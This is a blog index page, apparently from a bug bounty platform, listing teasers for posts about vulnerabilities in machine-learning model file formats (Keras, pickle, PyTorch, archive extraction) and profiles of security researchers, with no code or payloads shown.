Hunting Vulnerabilities in Keras Model Deserialization

The ability to save (serialize) and load (deserialize) trained models is fundamental to machine learning frameworks. Training a neural network can take hours, days or even weeks on expensive hardware, so developers...

Spotlight on taiphung217: Five-Month Climb to Huntr Leaderboard Glory

Introduction Some researchers dip their toes into AI/ML security. Phung Van Tai (aka @taiphung217) cannonballed in. Valedictorian of Vietnam’s Academy of Cryptography Techniques and now an AppSec engineer at OneMount Group, Tai...

Spotlight on Lyutoon: From Black Hat to Bug Bounties

Introduction Some Ph.D. candidates stay up late fine-tuning models. Tong Liu (aka Lyutoon) stays up late trying to break them. At huntr, we’ve got a thing for spotlighting hackers. This month, the...

Pivoting Archive Slip Bugs into High-Value AI/ML Bounties

Many ML model files— .nemo, .keras, .gguf, even trusty .pth— are just zip/tar archives in disguise. Feed one to a loader that blindly calls extractall()and pow, you’ve opened the door to an...

Inside CVE-2025-1550: Remote Code Execution via Keras Models

Before Google even filed CVE-2025-1550, one of our Huntr researchers, Mevlüt Akçam (aka mvlttt on huntr), quietly unearthed a critical flaw that delivers arbitrary code execution the moment you load a malformed .keras model—or, astonishingly,...

Spotlight on winters0x64: Leveraging CTF Skills for AI/ML Bug Bounty Success

Introduction Some people skipped online classes during lockdown to binge Netflix. Arun Krishnan skipped them to hack around on cheats for an online game—and ended up chasing bug bounties. This month, we're...

Pkl Rick’d: How Loading a .pkl File Can Lead to RCE

Sometimes the simplest bugs are the most dangerous — especially when they’ve been hiding in plain sight. This one’s a classic pattern: pickle.load() + unsafe deserialization = RCE. Let’s unpack a clean,...

Exposing Keras Lambda Exploits in TensorFlow Models

In this blog, we’re breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like TensorFlow—with its Keras Lambda layers—can be exploited. This example...

Don’t Trust Your Model: How a Malicious Pickle Payload in PyTorch Can Execute Code

In this blog, we're breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like PyTorch can be exploited. This example is a perfect...

Unlocking Bug Bounty Success: Expert Tips from Dan McInerney

What’s the secret sauce behind consistent bug bounty success? Well, the answer lies in a strategic approach: dissecting a single project, identifying hot spots, leveraging the right tools, and focusing on impactful...

Getting Started with Docker: A Hacker’s Guide

Hey huntrs, Marcello Salvati here, threat researcher at Protect AI (acquired by Palo Alto Networks). I’m here to give you a crash course on Docker. If you’re diving into security research, Docker...

How to Hunt Vulnerabilities in Machine Learning Model File Formats

Introduction Let's talk about an often overlooked attack surface in AI systems: model file formats. Sure, everyone focuses on API security and web vulnerabilities, but there's a whole world of potential bugs...